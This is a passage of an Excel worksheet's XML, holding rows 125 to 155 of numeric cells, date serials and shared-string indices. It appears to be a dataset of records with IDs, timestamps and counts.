      <c r="G125" s="10">
        <v>39693.752083333333</v>
      </c>
      <c r="H125" s="9">
        <v>3207</v>
      </c>
      <c r="I125" s="9" t="s">
        <v>2014</v>
      </c>
      <c r="J125" s="10">
        <v>39693.752083333333</v>
      </c>
      <c r="K125" s="3" t="s">
        <v>593</v>
      </c>
      <c r="L125" s="4">
        <v>3</v>
      </c>
      <c r="M125" s="4">
        <v>1</v>
      </c>
      <c r="N125" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O125" s="3"/>
      <c r="P125" s="3"/>
      <c r="Q125" s="3"/>
    </row>
    <row r="126" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A126" s="9">
        <v>40471</v>
      </c>
      <c r="B126" s="9" t="s">
        <v>949</v>
      </c>
      <c r="C126" s="9" t="s">
        <v>2015</v>
      </c>
      <c r="D126" s="9" t="s">
        <v>2016</v>
      </c>
      <c r="E126" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F126" s="9" t="s">
        <v>1603</v>
      </c>
      <c r="G126" s="10">
        <v>41845.70416666667</v>
      </c>
      <c r="H126" s="9">
        <v>3667943</v>
      </c>
      <c r="I126" s="9" t="s">
        <v>2017</v>
      </c>
      <c r="J126" s="10">
        <v>41845.384722222225</v>
      </c>
      <c r="K126" s="9" t="s">
        <v>950</v>
      </c>
      <c r="L126" s="7">
        <v>11</v>
      </c>
      <c r="M126" s="7">
        <v>9</v>
      </c>
      <c r="N126" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="127" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A127" s="9">
        <v>40480</v>
      </c>
      <c r="B127" s="9" t="s">
        <v>951</v>
      </c>
      <c r="C127" s="9" t="s">
        <v>2018</v>
      </c>
      <c r="D127" s="9" t="s">
        <v>2019</v>
      </c>
      <c r="E127" s="9">
        <v>211563</v>
      </c>
      <c r="F127" s="9" t="s">
        <v>2020</v>
      </c>
      <c r="G127" s="10">
        <v>40892.290972222225</v>
      </c>
      <c r="H127" s="9">
        <v>760489</v>
      </c>
      <c r="I127" s="9" t="s">
        <v>2021</v>
      </c>
      <c r="J127" s="10">
        <v>40812.538194444445</v>
      </c>
      <c r="K127" s="9" t="s">
        <v>952</v>
      </c>
      <c r="L127" s="7">
        <v>5</v>
      </c>
      <c r="M127" s="7">
        <v>3</v>
      </c>
      <c r="Q127" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="128" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A128" s="3">
        <v>40894</v>
      </c>
      <c r="B128" s="3" t="s">
        <v>594</v>
      </c>
      <c r="C128" s="9" t="s">
        <v>2022</v>
      </c>
      <c r="D128" s="9" t="s">
        <v>2023</v>
      </c>
      <c r="E128" s="9">
        <v>3434</v>
      </c>
      <c r="F128" s="9" t="s">
        <v>2024</v>
      </c>
      <c r="G128" s="10">
        <v>43073.895138888889</v>
      </c>
      <c r="H128" s="9">
        <v>-1</v>
      </c>
      <c r="I128" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J128" s="10">
        <v>43073.669444444444</v>
      </c>
      <c r="K128" s="3" t="s">
        <v>595</v>
      </c>
      <c r="L128" s="4">
        <v>7</v>
      </c>
      <c r="M128" s="4">
        <v>5</v>
      </c>
      <c r="N128" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O128" s="3"/>
      <c r="P128" s="3"/>
      <c r="Q128" s="3"/>
    </row>
    <row r="129" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A129" s="9">
        <v>41039</v>
      </c>
      <c r="B129" s="9" t="s">
        <v>953</v>
      </c>
      <c r="C129" s="9" t="s">
        <v>2026</v>
      </c>
      <c r="D129" s="9" t="s">
        <v>2027</v>
      </c>
      <c r="E129" s="9">
        <v>952</v>
      </c>
      <c r="F129" s="9" t="s">
        <v>2028</v>
      </c>
      <c r="G129" s="10">
        <v>39818.046527777777</v>
      </c>
      <c r="H129" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I129" s="9" t="s">
        <v>2029</v>
      </c>
      <c r="J129" s="10">
        <v>39754.089583333334</v>
      </c>
      <c r="K129" s="9" t="s">
        <v>954</v>
      </c>
      <c r="L129" s="7">
        <v>4</v>
      </c>
      <c r="M129" s="7">
        <v>2</v>
      </c>
      <c r="P129" s="9" t="s">
        <v>955</v>
      </c>
      <c r="Q129" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="130" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A130" s="3">
        <v>41156</v>
      </c>
      <c r="B130" s="3" t="s">
        <v>596</v>
      </c>
      <c r="C130" s="9" t="s">
        <v>2030</v>
      </c>
      <c r="D130" s="9" t="s">
        <v>2031</v>
      </c>
      <c r="E130" s="9">
        <v>3474</v>
      </c>
      <c r="F130" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="G130" s="10">
        <v>41874.275000000001</v>
      </c>
      <c r="H130" s="9">
        <v>1237575</v>
      </c>
      <c r="I130" s="9" t="s">
        <v>2032</v>
      </c>
      <c r="J130" s="10">
        <v>41873.5</v>
      </c>
      <c r="K130" s="3" t="s">
        <v>597</v>
      </c>
      <c r="L130" s="4">
        <v>9</v>
      </c>
      <c r="M130" s="4">
        <v>7</v>
      </c>
      <c r="N130" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O130" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P130" s="3"/>
      <c r="Q130" s="3"/>
    </row>
    <row r="131" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A131" s="3">
        <v>41463</v>
      </c>
      <c r="B131" s="3" t="s">
        <v>620</v>
      </c>
      <c r="C131" s="9" t="s">
        <v>2033</v>
      </c>
      <c r="D131" s="9" t="s">
        <v>2034</v>
      </c>
      <c r="E131" s="9">
        <v>1402846</v>
      </c>
      <c r="F131" s="9" t="s">
        <v>1794</v>
      </c>
      <c r="G131" s="10">
        <v>42502.058333333334</v>
      </c>
      <c r="H131" s="9">
        <v>462234</v>
      </c>
      <c r="I131" s="9" t="s">
        <v>2035</v>
      </c>
      <c r="J131" s="10">
        <v>42501.873611111114</v>
      </c>
      <c r="K131" s="3" t="s">
        <v>621</v>
      </c>
      <c r="L131" s="4">
        <v>4</v>
      </c>
      <c r="M131" s="4">
        <v>2</v>
      </c>
      <c r="N131" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O131" s="3"/>
      <c r="P131" s="3"/>
      <c r="Q131" s="3"/>
    </row>
    <row r="132" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A132" s="3">
        <v>42665</v>
      </c>
      <c r="B132" s="3" t="s">
        <v>622</v>
      </c>
      <c r="C132" s="9" t="s">
        <v>2036</v>
      </c>
      <c r="D132" s="9" t="s">
        <v>2037</v>
      </c>
      <c r="E132" s="9">
        <v>2194</v>
      </c>
      <c r="F132" s="9" t="s">
        <v>2038</v>
      </c>
      <c r="G132" s="10">
        <v>43018.890972222223</v>
      </c>
      <c r="H132" s="9">
        <v>4972721</v>
      </c>
      <c r="I132" s="9" t="s">
        <v>2039</v>
      </c>
      <c r="J132" s="10">
        <v>42946.397222222222</v>
      </c>
      <c r="K132" s="3" t="s">
        <v>623</v>
      </c>
      <c r="L132" s="4">
        <v>3</v>
      </c>
      <c r="M132" s="4">
        <v>1</v>
      </c>
      <c r="N132" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O132" s="3"/>
      <c r="P132" s="3"/>
      <c r="Q132" s="3"/>
    </row>
    <row r="133" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A133" s="3">
        <v>43496</v>
      </c>
      <c r="B133" s="3" t="s">
        <v>624</v>
      </c>
      <c r="C133" s="9" t="s">
        <v>2040</v>
      </c>
      <c r="D133" s="9" t="s">
        <v>2041</v>
      </c>
      <c r="E133" s="9">
        <v>3473046</v>
      </c>
      <c r="F133" s="9" t="s">
        <v>2042</v>
      </c>
      <c r="G133" s="10">
        <v>43025.629861111112</v>
      </c>
      <c r="H133" s="9">
        <v>3473046</v>
      </c>
      <c r="I133" s="9" t="s">
        <v>2042</v>
      </c>
      <c r="J133" s="10">
        <v>43025.622916666667</v>
      </c>
      <c r="K133" s="3" t="s">
        <v>625</v>
      </c>
      <c r="L133" s="4">
        <v>10</v>
      </c>
      <c r="M133" s="4">
        <v>8</v>
      </c>
      <c r="N133" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O133" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P133" s="3" t="s">
        <v>698</v>
      </c>
      <c r="Q133" s="3"/>
    </row>
    <row r="134" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A134" s="3">
        <v>43792</v>
      </c>
      <c r="B134" s="3" t="s">
        <v>626</v>
      </c>
      <c r="C134" s="9" t="s">
        <v>2043</v>
      </c>
      <c r="D134" s="9" t="s">
        <v>2044</v>
      </c>
      <c r="E134" s="9">
        <v>3279</v>
      </c>
      <c r="F134" s="9" t="s">
        <v>2045</v>
      </c>
      <c r="G134" s="10">
        <v>40660.634722222225</v>
      </c>
      <c r="H134" s="9">
        <v>3560</v>
      </c>
      <c r="I134" s="9" t="s">
        <v>2046</v>
      </c>
      <c r="J134" s="10">
        <v>40099.978472222225</v>
      </c>
      <c r="K134" s="3" t="s">
        <v>627</v>
      </c>
      <c r="L134" s="4">
        <v>3</v>
      </c>
      <c r="M134" s="4">
        <v>1</v>
      </c>
      <c r="N134" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O134" s="3"/>
      <c r="P134" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q134" s="3"/>
    </row>
    <row r="135" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A135" s="3">
        <v>44052</v>
      </c>
      <c r="B135" s="3" t="s">
        <v>628</v>
      </c>
      <c r="C135" s="9" t="s">
        <v>2047</v>
      </c>
      <c r="D135" s="9" t="s">
        <v>2048</v>
      </c>
      <c r="E135" s="9">
        <v>1945782</v>
      </c>
      <c r="F135" s="9" t="s">
        <v>2049</v>
      </c>
      <c r="G135" s="10">
        <v>43383.668749999997</v>
      </c>
      <c r="H135" s="9">
        <v>1945782</v>
      </c>
      <c r="I135" s="9" t="s">
        <v>2049</v>
      </c>
      <c r="J135" s="10">
        <v>43383.668055555558</v>
      </c>
      <c r="K135" s="3" t="s">
        <v>629</v>
      </c>
      <c r="L135" s="4">
        <v>3</v>
      </c>
      <c r="M135" s="4">
        <v>1</v>
      </c>
      <c r="N135" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O135" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P135" s="3"/>
      <c r="Q135" s="3"/>
    </row>
    <row r="136" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A136" s="3">
        <v>44166</v>
      </c>
      <c r="B136" s="3" t="s">
        <v>650</v>
      </c>
      <c r="C136" s="9" t="s">
        <v>2050</v>
      </c>
      <c r="D136" s="9" t="s">
        <v>2051</v>
      </c>
      <c r="E136" s="9">
        <v>4200</v>
      </c>
      <c r="F136" s="9" t="s">
        <v>2052</v>
      </c>
      <c r="G136" s="10">
        <v>40711.522222222222</v>
      </c>
      <c r="H136" s="9">
        <v>103385</v>
      </c>
      <c r="I136" s="9" t="s">
        <v>2053</v>
      </c>
      <c r="J136" s="10">
        <v>40616.230555555558</v>
      </c>
      <c r="K136" s="3" t="s">
        <v>651</v>
      </c>
      <c r="L136" s="4">
        <v>3</v>
      </c>
      <c r="M136" s="4">
        <v>1</v>
      </c>
      <c r="N136" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O136" s="3"/>
      <c r="P136" s="3"/>
      <c r="Q136" s="3"/>
    </row>
    <row r="137" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A137" s="3">
        <v>44393</v>
      </c>
      <c r="B137" s="3" t="s">
        <v>652</v>
      </c>
      <c r="C137" s="9" t="s">
        <v>2054</v>
      </c>
      <c r="D137" s="9" t="s">
        <v>2055</v>
      </c>
      <c r="E137" s="9">
        <v>265570</v>
      </c>
      <c r="F137" s="9" t="s">
        <v>2056</v>
      </c>
      <c r="G137" s="10">
        <v>40837.777777777781</v>
      </c>
      <c r="H137" s="9">
        <v>2</v>
      </c>
      <c r="I137" s="9" t="s">
        <v>1977</v>
      </c>
      <c r="J137" s="10">
        <v>40015.728472222225</v>
      </c>
      <c r="K137" s="3" t="s">
        <v>653</v>
      </c>
      <c r="L137" s="4">
        <v>4</v>
      </c>
      <c r="M137" s="4">
        <v>2</v>
      </c>
      <c r="N137" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O137" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P137" s="3"/>
      <c r="Q137" s="3"/>
    </row>
    <row r="138" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A138" s="3">
        <v>45580</v>
      </c>
      <c r="B138" s="3" t="s">
        <v>654</v>
      </c>
      <c r="C138" s="9" t="s">
        <v>2057</v>
      </c>
      <c r="D138" s="9" t="s">
        <v>2058</v>
      </c>
      <c r="E138" s="9">
        <v>4725</v>
      </c>
      <c r="F138" s="9" t="s">
        <v>2059</v>
      </c>
      <c r="G138" s="10">
        <v>41127.701388888891</v>
      </c>
      <c r="H138" s="9">
        <v>1133011</v>
      </c>
      <c r="I138" s="9" t="s">
        <v>2060</v>
      </c>
      <c r="J138" s="10">
        <v>41127.247916666667</v>
      </c>
      <c r="K138" s="3" t="s">
        <v>655</v>
      </c>
      <c r="L138" s="4">
        <v>4</v>
      </c>
      <c r="M138" s="4">
        <v>2</v>
      </c>
      <c r="N138" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O138" s="3"/>
      <c r="P138" s="3"/>
      <c r="Q138" s="3"/>
    </row>
    <row r="139" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A139" s="3">
        <v>45603</v>
      </c>
      <c r="B139" s="3" t="s">
        <v>656</v>
      </c>
      <c r="C139" s="9" t="s">
        <v>2061</v>
      </c>
      <c r="D139" s="9" t="s">
        <v>2062</v>
      </c>
      <c r="E139" s="9">
        <v>54981</v>
      </c>
      <c r="F139" s="9" t="s">
        <v>2063</v>
      </c>
      <c r="G139" s="10">
        <v>41347.460416666669</v>
      </c>
      <c r="H139" s="9">
        <v>707798</v>
      </c>
      <c r="I139" s="9" t="s">
        <v>2064</v>
      </c>
      <c r="J139" s="10">
        <v>41347.459722222222</v>
      </c>
      <c r="K139" s="3" t="s">
        <v>657</v>
      </c>
      <c r="L139" s="4">
        <v>3</v>
      </c>
      <c r="M139" s="4">
        <v>1</v>
      </c>
      <c r="N139" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O139" s="3"/>
      <c r="P139" s="3"/>
      <c r="Q139" s="3"/>
    </row>
    <row r="140" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A140" s="3">
        <v>46181</v>
      </c>
      <c r="B140" s="3" t="s">
        <v>658</v>
      </c>
      <c r="C140" s="9" t="s">
        <v>2065</v>
      </c>
      <c r="D140" s="9" t="s">
        <v>2066</v>
      </c>
      <c r="E140" s="9">
        <v>19746</v>
      </c>
      <c r="F140" s="9" t="s">
        <v>2067</v>
      </c>
      <c r="G140" s="10">
        <v>42345.449305555558</v>
      </c>
      <c r="H140" s="9">
        <v>817447</v>
      </c>
      <c r="I140" s="9" t="s">
        <v>2068</v>
      </c>
      <c r="J140" s="10">
        <v>42194.727083333331</v>
      </c>
      <c r="K140" s="3" t="s">
        <v>659</v>
      </c>
      <c r="L140" s="4">
        <v>9</v>
      </c>
      <c r="M140" s="4">
        <v>7</v>
      </c>
      <c r="N140" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O140" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P140" s="3"/>
      <c r="Q140" s="3"/>
    </row>
    <row r="141" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A141" s="3">
        <v>46491</v>
      </c>
      <c r="B141" s="3" t="s">
        <v>660</v>
      </c>
      <c r="C141" s="9" t="s">
        <v>2069</v>
      </c>
      <c r="D141" s="9" t="s">
        <v>2070</v>
      </c>
      <c r="E141" s="9">
        <v>572</v>
      </c>
      <c r="F141" s="9" t="s">
        <v>2071</v>
      </c>
      <c r="G141" s="10">
        <v>43399.474305555559</v>
      </c>
      <c r="H141" s="9">
        <v>96944</v>
      </c>
      <c r="I141" s="9" t="s">
        <v>2072</v>
      </c>
      <c r="J141" s="10">
        <v>42765.370833333334</v>
      </c>
      <c r="K141" s="3" t="s">
        <v>661</v>
      </c>
      <c r="L141" s="4">
        <v>4</v>
      </c>
      <c r="M141" s="4">
        <v>2</v>
      </c>
      <c r="N141" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O141" s="3"/>
      <c r="P141" s="3"/>
      <c r="Q141" s="3"/>
    </row>
    <row r="142" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A142" s="3">
        <v>47628</v>
      </c>
      <c r="B142" s="3" t="s">
        <v>662</v>
      </c>
      <c r="C142" s="9" t="s">
        <v>2073</v>
      </c>
      <c r="D142" s="9" t="s">
        <v>2074</v>
      </c>
      <c r="E142" s="9">
        <v>4725</v>
      </c>
      <c r="F142" s="9" t="s">
        <v>2059</v>
      </c>
      <c r="G142" s="10">
        <v>41897.661805555559</v>
      </c>
      <c r="H142" s="9">
        <v>2021812</v>
      </c>
      <c r="I142" s="9" t="s">
        <v>2075</v>
      </c>
      <c r="J142" s="10">
        <v>41897.429861111108</v>
      </c>
      <c r="K142" s="3" t="s">
        <v>663</v>
      </c>
      <c r="L142" s="4">
        <v>5</v>
      </c>
      <c r="M142" s="4">
        <v>3</v>
      </c>
      <c r="N142" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O142" s="3"/>
      <c r="P142" s="3"/>
      <c r="Q142" s="3"/>
    </row>
    <row r="143" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A143" s="9">
        <v>67699</v>
      </c>
      <c r="B143" s="9" t="s">
        <v>956</v>
      </c>
      <c r="C143" s="9" t="s">
        <v>2076</v>
      </c>
      <c r="D143" s="9" t="s">
        <v>2077</v>
      </c>
      <c r="E143" s="9">
        <v>117</v>
      </c>
      <c r="F143" s="9" t="s">
        <v>2078</v>
      </c>
      <c r="G143" s="10">
        <v>42115.98541666667</v>
      </c>
      <c r="H143" s="9">
        <v>631619</v>
      </c>
      <c r="I143" s="9" t="s">
        <v>2079</v>
      </c>
      <c r="J143" s="10">
        <v>42076.50277777778</v>
      </c>
      <c r="K143" s="9" t="s">
        <v>957</v>
      </c>
      <c r="L143" s="7">
        <v>11</v>
      </c>
      <c r="M143" s="7">
        <v>9</v>
      </c>
      <c r="N143" s="9" t="s">
        <v>698</v>
      </c>
      <c r="O143" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="144" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A144" s="9">
        <v>68067</v>
      </c>
      <c r="B144" s="9" t="s">
        <v>958</v>
      </c>
      <c r="C144" s="9" t="s">
        <v>2080</v>
      </c>
      <c r="D144" s="9" t="s">
        <v>2081</v>
      </c>
      <c r="E144" s="9">
        <v>7173</v>
      </c>
      <c r="F144" s="9" t="s">
        <v>2082</v>
      </c>
      <c r="G144" s="10">
        <v>41610.791666666664</v>
      </c>
      <c r="H144" s="9">
        <v>2432317</v>
      </c>
      <c r="I144" s="9" t="s">
        <v>2083</v>
      </c>
      <c r="J144" s="10">
        <v>41610.582638888889</v>
      </c>
      <c r="K144" s="9" t="s">
        <v>959</v>
      </c>
      <c r="L144" s="7">
        <v>3</v>
      </c>
      <c r="M144" s="7">
        <v>1</v>
      </c>
      <c r="Q144" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="145" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A145" s="3">
        <v>68611</v>
      </c>
      <c r="B145" s="3" t="s">
        <v>41</v>
      </c>
      <c r="C145" s="9" t="s">
        <v>2084</v>
      </c>
      <c r="D145" s="9" t="s">
        <v>2085</v>
      </c>
      <c r="E145" s="9">
        <v>3153</v>
      </c>
      <c r="F145" s="9" t="s">
        <v>2086</v>
      </c>
      <c r="G145" s="10">
        <v>39707.104166666664</v>
      </c>
      <c r="H145" s="9">
        <v>3153</v>
      </c>
      <c r="I145" s="9" t="s">
        <v>2086</v>
      </c>
      <c r="J145" s="10">
        <v>39707.074305555558</v>
      </c>
      <c r="K145" s="3" t="s">
        <v>42</v>
      </c>
      <c r="L145" s="4">
        <v>3</v>
      </c>
      <c r="M145" s="4">
        <v>1</v>
      </c>
      <c r="N145" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O145" s="3"/>
      <c r="P145" s="3"/>
      <c r="Q145" s="3"/>
    </row>
    <row r="146" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A146" s="3">
        <v>68826</v>
      </c>
      <c r="B146" s="3" t="s">
        <v>43</v>
      </c>
      <c r="C146" s="9" t="s">
        <v>2087</v>
      </c>
      <c r="D146" s="9" t="s">
        <v>2088</v>
      </c>
      <c r="E146" s="9">
        <v>10387</v>
      </c>
      <c r="F146" s="9" t="s">
        <v>2089</v>
      </c>
      <c r="G146" s="10">
        <v>39707.099305555559</v>
      </c>
      <c r="H146" s="9">
        <v>10387</v>
      </c>
      <c r="I146" s="9" t="s">
        <v>2089</v>
      </c>
      <c r="J146" s="10">
        <v>39707.09375</v>
      </c>
      <c r="K146" s="3" t="s">
        <v>44</v>
      </c>
      <c r="L146" s="4">
        <v>2</v>
      </c>
      <c r="M146" s="4">
        <v>1</v>
      </c>
      <c r="N146" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O146" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P146" s="3"/>
      <c r="Q146" s="3"/>
    </row>
    <row r="147" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A147" s="3">
        <v>68950</v>
      </c>
      <c r="B147" s="3" t="s">
        <v>45</v>
      </c>
      <c r="C147" s="9" t="s">
        <v>2090</v>
      </c>
      <c r="D147" s="9" t="s">
        <v>2090</v>
      </c>
      <c r="E147" s="9">
        <v>10823</v>
      </c>
      <c r="F147" s="9" t="s">
        <v>2091</v>
      </c>
      <c r="G147" s="10">
        <v>39707.113888888889</v>
      </c>
      <c r="H147" s="9">
        <v>10823</v>
      </c>
      <c r="I147" s="9" t="s">
        <v>2091</v>
      </c>
      <c r="J147" s="10">
        <v>39707.109027777777</v>
      </c>
      <c r="K147" s="3" t="s">
        <v>46</v>
      </c>
      <c r="L147" s="4">
        <v>2</v>
      </c>
      <c r="M147" s="4">
        <v>1</v>
      </c>
      <c r="N147" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O147" s="3"/>
      <c r="P147" s="3"/>
      <c r="Q147" s="3"/>
    </row>
    <row r="148" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A148" s="9">
        <v>69766</v>
      </c>
      <c r="B148" s="9" t="s">
        <v>960</v>
      </c>
      <c r="C148" s="9" t="s">
        <v>2092</v>
      </c>
      <c r="D148" s="9" t="s">
        <v>2093</v>
      </c>
      <c r="E148" s="9">
        <v>7850</v>
      </c>
      <c r="F148" s="9" t="s">
        <v>2094</v>
      </c>
      <c r="G148" s="10">
        <v>39715.502083333333</v>
      </c>
      <c r="H148" s="9">
        <v>7850</v>
      </c>
      <c r="I148" s="9" t="s">
        <v>2094</v>
      </c>
      <c r="J148" s="10">
        <v>39715.46875</v>
      </c>
      <c r="K148" s="9" t="s">
        <v>961</v>
      </c>
      <c r="L148" s="7">
        <v>6</v>
      </c>
      <c r="M148" s="7">
        <v>4</v>
      </c>
      <c r="Q148" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="149" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A149" s="3">
        <v>70236</v>
      </c>
      <c r="B149" s="3" t="s">
        <v>99</v>
      </c>
      <c r="C149" s="9" t="s">
        <v>2095</v>
      </c>
      <c r="D149" s="9" t="s">
        <v>2096</v>
      </c>
      <c r="E149" s="9">
        <v>1969</v>
      </c>
      <c r="F149" s="9" t="s">
        <v>2097</v>
      </c>
      <c r="G149" s="10">
        <v>43386.775694444441</v>
      </c>
      <c r="H149" s="9">
        <v>9780149</v>
      </c>
      <c r="I149" s="9" t="s">
        <v>2098</v>
      </c>
      <c r="J149" s="10">
        <v>43386.759027777778</v>
      </c>
      <c r="K149" s="3" t="s">
        <v>100</v>
      </c>
      <c r="L149" s="4">
        <v>4</v>
      </c>
      <c r="M149" s="4">
        <v>2</v>
      </c>
      <c r="N149" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O149" s="3"/>
      <c r="P149" s="3"/>
      <c r="Q149" s="3"/>
    </row>
    <row r="150" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A150" s="9">
        <v>70579</v>
      </c>
      <c r="B150" s="9" t="s">
        <v>962</v>
      </c>
      <c r="C150" s="9" t="s">
        <v>2099</v>
      </c>
      <c r="D150" s="9" t="s">
        <v>2100</v>
      </c>
      <c r="E150" s="9">
        <v>426671</v>
      </c>
      <c r="F150" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G150" s="10">
        <v>42816.676388888889</v>
      </c>
      <c r="H150" s="9">
        <v>7275984</v>
      </c>
      <c r="I150" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J150" s="10">
        <v>42815.836111111108</v>
      </c>
      <c r="K150" s="9" t="s">
        <v>963</v>
      </c>
      <c r="L150" s="7">
        <v>5</v>
      </c>
      <c r="M150" s="7">
        <v>2</v>
      </c>
      <c r="N150" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="151" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A151" s="3">
        <v>70613</v>
      </c>
      <c r="B151" s="3" t="s">
        <v>101</v>
      </c>
      <c r="C151" s="9" t="s">
        <v>2103</v>
      </c>
      <c r="D151" s="9" t="s">
        <v>2104</v>
      </c>
      <c r="E151" s="9">
        <v>7647</v>
      </c>
      <c r="F151" s="9" t="s">
        <v>2105</v>
      </c>
      <c r="G151" s="10">
        <v>41513.328472222223</v>
      </c>
      <c r="H151" s="9">
        <v>2218452</v>
      </c>
      <c r="I151" s="9" t="s">
        <v>2106</v>
      </c>
      <c r="J151" s="10">
        <v>41507.757638888892</v>
      </c>
      <c r="K151" s="3" t="s">
        <v>102</v>
      </c>
      <c r="L151" s="4">
        <v>3</v>
      </c>
      <c r="M151" s="4">
        <v>1</v>
      </c>
      <c r="N151" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O151" s="3"/>
      <c r="P151" s="3"/>
      <c r="Q151" s="3"/>
    </row>
    <row r="152" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A152" s="3">
        <v>70765</v>
      </c>
      <c r="B152" s="3" t="s">
        <v>103</v>
      </c>
      <c r="C152" s="9" t="s">
        <v>2107</v>
      </c>
      <c r="D152" s="9" t="s">
        <v>2108</v>
      </c>
      <c r="E152" s="9">
        <v>893</v>
      </c>
      <c r="F152" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="G152" s="10">
        <v>41996.843055555553</v>
      </c>
      <c r="H152" s="9">
        <v>1565862</v>
      </c>
      <c r="I152" s="9" t="s">
        <v>2110</v>
      </c>
      <c r="J152" s="10">
        <v>41996.816666666666</v>
      </c>
      <c r="K152" s="3" t="s">
        <v>104</v>
      </c>
      <c r="L152" s="4">
        <v>4</v>
      </c>
      <c r="M152" s="4">
        <v>2</v>
      </c>
      <c r="N152" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O152" s="3"/>
      <c r="P152" s="3"/>
      <c r="Q152" s="3"/>
    </row>
    <row r="153" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A153" s="3">
        <v>70802</v>
      </c>
      <c r="B153" s="3" t="s">
        <v>105</v>
      </c>
      <c r="C153" s="9" t="s">
        <v>2111</v>
      </c>
      <c r="D153" s="9" t="s">
        <v>2112</v>
      </c>
      <c r="E153" s="9">
        <v>1139697</v>
      </c>
      <c r="F153" s="9" t="s">
        <v>2113</v>
      </c>
      <c r="G153" s="10">
        <v>42051.640972222223</v>
      </c>
      <c r="H153" s="9">
        <v>1263783</v>
      </c>
      <c r="I153" s="9" t="s">
        <v>2114</v>
      </c>
      <c r="J153" s="10">
        <v>42051.413194444445</v>
      </c>
      <c r="K153" s="3" t="s">
        <v>106</v>
      </c>
      <c r="L153" s="4">
        <v>5</v>
      </c>
      <c r="M153" s="4">
        <v>3</v>
      </c>
      <c r="N153" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O153" s="3"/>
      <c r="P153" s="3"/>
      <c r="Q153" s="3"/>
    </row>
    <row r="154" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A154" s="3">
        <v>71310</v>
      </c>
      <c r="B154" s="3" t="s">
        <v>167</v>
      </c>
      <c r="C154" s="9" t="s">
        <v>2115</v>
      </c>
      <c r="D154" s="9" t="s">
        <v>2116</v>
      </c>
      <c r="E154" s="9">
        <v>2548</v>
      </c>
      <c r="F154" s="9" t="s">
        <v>801</v>
      </c>
      <c r="G154" s="10">
        <v>41628.418055555558</v>
      </c>
      <c r="H154" s="9">
        <v>8418</v>
      </c>
      <c r="I154" s="9" t="s">
        <v>2117</v>
      </c>
      <c r="J154" s="10">
        <v>41627.602083333331</v>
      </c>
      <c r="K154" s="3" t="s">
        <v>168</v>
      </c>
      <c r="L154" s="4">
        <v>4</v>
      </c>
      <c r="M154" s="4">
        <v>2</v>
      </c>
      <c r="N154" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O154" s="3"/>
      <c r="P154" s="3"/>
      <c r="Q154" s="3"/>
    </row>
    <row r="155" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A155" s="9">
        <v>71332</v>
      </c>
      <c r="B155" s="9" t="s">
        <v>964</v>
      </c>
